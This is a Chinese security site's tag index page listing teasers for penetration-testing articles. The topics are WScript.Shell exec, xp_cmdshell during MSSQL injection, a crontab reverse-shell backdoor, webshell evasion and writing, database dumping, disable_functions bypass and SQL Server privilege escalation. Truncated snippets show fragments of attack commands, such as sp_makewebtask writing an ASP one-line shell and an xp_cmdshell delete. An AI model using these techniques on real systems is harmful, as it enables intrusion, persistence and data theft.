exec - 第 8 | CN-SEC 中文网

WScript.Shell: 对象的run和exec使用详解

vbScript 中 WScript.Shell 对象的 run 和 exec 函数功能使用详解函数声明： Set Ws = CreateObject("Wscript.Shell"...

04月03日lcx118 views评论

阅读全文

mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法

mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。微软ms sql 2000/2005 注入时exec xp_cmds...

04月03日lcx108 views评论

阅读全文

一条命令实现无文件兼容性强的反弹后门

一条命令实现无文件兼容性强的反弹后门猪猪侠 (A) | 2015-01-25 20:15 最好用一个不常见的用户执行，任务写入/var/spool/cron/$username (crontab -...

04月02日lcx51 views评论

阅读全文

安全文章

jsp webshell免杀的一次小姿势

今天渗透测试的时候找到一个可以上传jsp的上传点，但是总是上传一句话、大马、冰蝎马的时候显示链接被重置(connection reset)或者通信异常(socket error)，有啥办法绕过呢？ &...

03月19日19 views评论

阅读全文

面试经验总结

大型企业渗透测试个人去做怎么做我认为步骤应该是信息搜集，扫描，入侵，内网渗透这么个思路，实际上他在问的时候，我并不知道他想让我回答什么内容。我刚提到信息搜集，就开始下一个问题了。安全模式下绕过php的...

01月19日安全闲碎146 views评论

阅读全文

安全文章

MSSQL把查询的东西写到文件中

当做另一种写shell的方式，或者导出数据的方法吧。exec sp_makewebtask 'c:wwwtestwri.asp','select''<%execute(request("SB")...

10月07日348 views评论

阅读全文

代码审计

crontab一句话后门分析

正常版本(crontab -l;echo '*/60 * * * * exec 9<> /dev/...

08月10日308 views评论

阅读全文

站库分离拖库技巧

Mssql SA权限 exec master.dbo.xp_cmdshell "del c:/bak" -- backup database 数据库名 to disk = 'c:/bak' --备份整...

11月21日moonsec_com333 views评论

阅读全文

利用pcntl_exec突破disable_functions

在做渗透的时候被disable_functions 卡住不能执行命令是家常便饭，今天在一国外虚拟主机上又被卡了，但我在执行phpinfo();的时候眼前闪过–enable-pcn...

11月21日moonsec_com432 views评论

阅读全文

SP_OACreate提权经验总结

5）如果该服务器有网站，则直接用方法4）写入一句话本文作者：珍惜少年时

05月19日颓废's Blog1,344 views评论

阅读全文

1433端口sa权限提升权重代码

碰到SA权限降权的时候需要在SQL查询分析器里，输入 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configu...

05月19日颓废's Blog586 views评论

阅读全文

WScript.Shell: 对象的run和exec使用详解

mssql exec xp_cmdshell 调用'CreateProcess'失败解决办法

一条命令实现无文件兼容性强的反弹后门

jsp webshell免杀的一次小姿势

面试经验总结

MSSQL把查询的东西写到文件中

crontab一句话后门分析

站库分离拖库技巧

利用pcntl_exec突破disable_functions

SP_OACreate提权经验总结

1433端口sa权限提升权重代码

在线咨询

微信